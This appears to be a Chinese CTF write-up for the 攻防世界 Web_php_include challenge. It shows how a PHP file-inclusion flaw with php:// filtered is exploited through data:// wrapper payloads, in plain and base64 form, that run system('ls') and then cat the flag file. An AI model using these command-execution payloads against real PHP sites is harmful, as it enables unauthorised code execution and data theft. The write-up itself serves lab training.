攻防世界-WEB-Web_php_include

打开靶机

通过代码审计可以知道,存在文件包含漏洞,并且对伪协议php://进行了过滤。

发现根目录下存在phpinfo

观察phpinfo发现如下:

这两个都为on

所以我们就可以使用data://伪协议

payload如下:

html 复制代码
- ?page=data://text/plain,<?phpsystem("ls")?>- ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=    #base64编码

访问新连接

上面的payload就可以实现命令执行了

找了半天发现flag在fl4gisisish3r3.php文件中

使用如下payload就可以获取flag了

html 复制代码
?page=data://text/plain,<?phpsystem("cat fl4gisisish3r3.php")?>

使用该命令获取的flag被隐藏了,直接在web界面找不到,可以通过查看网页源代码查看

拿到flag

相关推荐
rit843249929 分钟前
基于MATLAB的模糊图像复原
开发语言·matlab
fie888934 分钟前
基于MATLAB的声呐图像特征提取与显示
开发语言·人工智能
_extraordinary_2 小时前
Java SpringMVC(二) --- 响应,综合性练习
java·开发语言
@。1243 小时前
对于灰度发布(金丝雀发布)的了解
开发语言·前端
hsjkdhs3 小时前
C++之多层继承、多源继承、菱形继承
开发语言·c++·算法
Full Stack Developme4 小时前
Python Redis 教程
开发语言·redis·python
qq_4924484464 小时前
Jmeter设置负载阶梯式压测场景(详解教程)
开发语言·python·jmeter
ID_180079054735 小时前
京东获取整站实时商品详情数据|商品标题|数据分析提取教程
java·开发语言
qiuiuiu4136 小时前
正点原子RK3568学习日志-编译第一个驱动程序helloworld
linux·c语言·开发语言·单片机
molong9316 小时前
Kotlin 内联函数、高阶函数、扩展函数
android·开发语言·kotlin